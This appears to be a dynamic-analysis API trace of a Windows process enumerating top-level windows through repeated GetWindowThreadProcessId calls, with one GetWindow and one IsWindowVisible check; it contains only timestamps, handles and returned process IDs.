	[0939.657] GetWindowThreadProcessId (in: hWnd=0x10b74, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1ff0
	[0939.657] GetWindowThreadProcessId (in: hWnd=0x10b66, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1a84
	[0939.657] GetWindowThreadProcessId (in: hWnd=0x10b62, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1fb0
	[0939.657] GetWindowThreadProcessId (in: hWnd=0x10b5e, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1e10
	[0939.657] GetWindowThreadProcessId (in: hWnd=0x10b52, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x23a8
	[0939.657] GetWindowThreadProcessId (in: hWnd=0x20b46, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1f24
	[0939.657] GetWindowThreadProcessId (in: hWnd=0x20b3c, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x21ec
	[0939.658] GetWindowThreadProcessId (in: hWnd=0x20b32, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x2320
	[0939.658] GetWindowThreadProcessId (in: hWnd=0x10b28, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1fd4
	[0939.658] GetWindowThreadProcessId (in: hWnd=0x10b0c, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1880
	[0939.658] GetWindowThreadProcessId (in: hWnd=0x10af6, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1b18
	[0939.658] GetWindowThreadProcessId (in: hWnd=0x10aea, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1d6c
	[0939.658] GetWindowThreadProcessId (in: hWnd=0x10ade, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x233c
	[0939.658] GetWindowThreadProcessId (in: hWnd=0x10ad2, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x2368
	[0939.658] GetWindowThreadProcessId (in: hWnd=0x10ace, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x2124
	[0939.658] GetWindowThreadProcessId (in: hWnd=0x10aca, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x22f0
	[0939.658] GetWindowThreadProcessId (in: hWnd=0x10ac4, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x22ac
	[0939.658] GetWindowThreadProcessId (in: hWnd=0x30932, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1cdc
	[0939.658] GetWindowThreadProcessId (in: hWnd=0x308c2, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x10f0
	[0939.659] GetWindowThreadProcessId (in: hWnd=0x10ab6, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1f18
	[0939.659] GetWindowThreadProcessId (in: hWnd=0x10ab4, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x20a8
	[0939.659] GetWindowThreadProcessId (in: hWnd=0x10a78, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x2004
	[0939.659] GetWindowThreadProcessId (in: hWnd=0x10a68, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1f88
	[0939.659] GetWindowThreadProcessId (in: hWnd=0x10a4a, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1f84
	[0939.659] GetWindowThreadProcessId (in: hWnd=0x20a3e, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x2050
	[0939.659] GetWindowThreadProcessId (in: hWnd=0x40528, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1e04
	[0939.659] GetWindowThreadProcessId (in: hWnd=0x20816, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1ecc
	[0939.659] GetWindowThreadProcessId (in: hWnd=0x10a2c, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1e64
	[0939.659] GetWindowThreadProcessId (in: hWnd=0x2056e, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1b58
	[0939.659] GetWindowThreadProcessId (in: hWnd=0x10a1e, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1e94
	[0939.659] GetWindowThreadProcessId (in: hWnd=0x10a0e, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1e28
	[0939.659] GetWindowThreadProcessId (in: hWnd=0x10a0a, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1df8
	[0939.659] GetWindowThreadProcessId (in: hWnd=0x10a06, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1da8
	[0939.660] GetWindowThreadProcessId (in: hWnd=0x3060a, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1c70
	[0939.660] GetWindowThreadProcessId (in: hWnd=0x109ec, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x163c
	[0939.660] GetWindowThreadProcessId (in: hWnd=0x109de, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1a10
	[0939.660] GetWindowThreadProcessId (in: hWnd=0x109c4, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x186c
	[0939.660] GetWindowThreadProcessId (in: hWnd=0x109b4, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1d74
	[0939.660] GetWindowThreadProcessId (in: hWnd=0x1099a, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x4c8
	[0939.660] GetWindowThreadProcessId (in: hWnd=0x1098c, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1960
	[0939.660] GetWindowThreadProcessId (in: hWnd=0x1097c, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1ce4
	[0939.660] GetWindowThreadProcessId (in: hWnd=0x1093c, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1b24
	[0939.660] GetWindowThreadProcessId (in: hWnd=0x20942, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x14e0
	[0939.660] GetWindowThreadProcessId (in: hWnd=0x204b0, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x17f0
	[0939.660] GetWindowThreadProcessId (in: hWnd=0x10952, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x854
	[0939.660] GetWindowThreadProcessId (in: hWnd=0x10950, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1268
	[0939.661] GetWindowThreadProcessId (in: hWnd=0x1094e, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1624
	[0939.661] GetWindowThreadProcessId (in: hWnd=0x1094c, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1b9c
	[0939.661] GetWindowThreadProcessId (in: hWnd=0x1094a, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x16f4
	[0939.661] GetWindowThreadProcessId (in: hWnd=0x10948, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x145c
	[0939.661] GetWindowThreadProcessId (in: hWnd=0x1093e, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x17d0
	[0939.661] GetWindowThreadProcessId (in: hWnd=0x206ba, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1d28
	[0939.661] GetWindowThreadProcessId (in: hWnd=0x1093a, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0xcb8
	[0939.661] GetWindowThreadProcessId (in: hWnd=0x20614, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1190
	[0939.661] GetWindowThreadProcessId (in: hWnd=0x2041c, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x3a8
	[0939.661] GetWindowThreadProcessId (in: hWnd=0x20420, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1bd0
	[0939.661] GetWindowThreadProcessId (in: hWnd=0x304c0, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1bfc
	[0939.661] GetWindowThreadProcessId (in: hWnd=0x108b8, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1a78
	[0939.662] GetWindowThreadProcessId (in: hWnd=0x108b2, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1b90
	[0939.662] GetWindowThreadProcessId (in: hWnd=0x108ac, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1b04
	[0939.662] GetWindowThreadProcessId (in: hWnd=0x108a0, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1b34
	[0939.662] GetWindowThreadProcessId (in: hWnd=0x1088e, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1b64
	[0939.662] GetWindowThreadProcessId (in: hWnd=0x1087c, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1bb0
	[0939.662] GetWindowThreadProcessId (in: hWnd=0x204f6, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1acc
	[0939.662] GetWindowThreadProcessId (in: hWnd=0x1083e, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1a2c
	[0939.662] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x19a8
	[0939.662] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1944
	[0939.662] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x18c8
	[0939.662] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x18ac
	[0939.662] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x18ec
	[0939.662] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1898
	[0939.663] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0xc98
	[0939.663] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x153c
	[0939.663] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1808
	[0939.663] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x12a4
	[0939.663] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1740
	[0939.663] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x16c4
	[0939.663] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1820
	[0939.663] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x16ac
	[0939.663] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1858
	[0939.663] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1664
	[0939.663] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x10b4
	[0939.663] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x10ac
	[0939.664] GetWindow (hWnd=0x10774, uCmd=0x4) returned 0x0
	[0939.665] IsWindowVisible (hWnd=0x10774) returned 0
	[0939.665] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x10ec
	[0939.665] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1068
	[0939.665] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x17e0
	[0939.665] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x102c
	[0939.665] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x17a4
	[0939.665] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1050
	[0939.665] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1694
	[0939.665] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1770
	[0939.665] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1720
	[0939.665] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x165c
	[0939.665] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1578
	[0939.665] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x16c0
	[0939.666] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x161c
	[0939.666] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1638
	[0939.666] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x15c8
	[0939.666] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1554
	[0939.666] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1674
	[0939.666] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1520
	[0939.666] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x14bc
	[0939.666] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0xf8c
	[0939.666] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0xe9c
	[0939.666] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1434
	[0939.666] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x14ec
	[0939.666] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0xfcc
	[0939.666] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x12ac
	[0939.666] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1484
	[0939.667] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x934
	[0939.667] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0xc0c
	[0939.667] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0xb08
	[0939.667] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x948
	[0939.667] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1178
	[0939.667] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x13e0
	[0939.667] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0xcd0
	[0939.667] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x13fc
	[0939.667] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0xdc8
	[0939.667] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0xc18
	[0939.667] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0xc2c
	[0939.667] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0xa1c
	[0939.667] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1244
	[0939.668] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0xdb0
	[0939.668] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1398
	[0939.668] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1358
	[0939.668] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1370
	[0939.668] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1340
	[0939.668] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x130c
	[0939.668] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x12c0
	[0939.668] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x12e4
	[0939.668] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1270
	[0939.668] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1298
	[0939.668] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x120c
	[0939.668] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x122c
	[0939.668] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x11c4
	[0939.669] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x11b0
	[0939.669] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1188
	[0939.669] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1148
	[0939.669] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1160
	[0939.669] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x10fc
	[0939.669] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0xe34
	[0939.669] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0xea4
	[0939.669] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x514
	[0939.669] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0xe48
	[0939.669] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0xbc8
	[0939.669] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0xdf8
	[0939.669] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x318
	[0939.669] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0xcac
	[0939.670] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x8bc
	[0939.670] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0xf9c
	[0939.670] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0xf48
	[0939.670] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0xe40
	[0939.670] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0xecc
	[0939.670] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0xeb8
	[0939.670] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0xe80
	[0939.670] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0xe98
	[0939.670] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0xe60
	[0939.670] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0xee4
	[0939.670] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0xf00
	[0939.670] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0xdf0
	[0939.671] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0xe1c
	[0939.671] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0xdd0
	[0939.671] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0xd94
	[0939.671] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0xd74
	[0939.671] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0xd00
	[0939.671] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0xcd8
	[0939.671] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0xc84
	[0939.671] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0xca4
	[0939.671] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0xc64
	[0939.671] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0xc24
	[0939.671] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0xb84
	[0939.671] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0xbac
	[0939.671] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x384
	[0939.672] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0xab8
	[0939.672] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x33c
	[0939.672] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0xa44
	[0939.672] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0xa64
	[0939.672] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x8a8
	[0939.672] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0xaf0
	[0939.672] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x88c
	[0939.672] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0xb04
	[0939.672] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x910
	[0939.672] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x230
	[0939.672] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0xac0
	[0939.672] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0xab4
	[0939.672] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0xaac
	[0939.672] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x3d0
	[0939.673] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x978
	[0939.673] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0xa7c
	[0939.673] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x59c
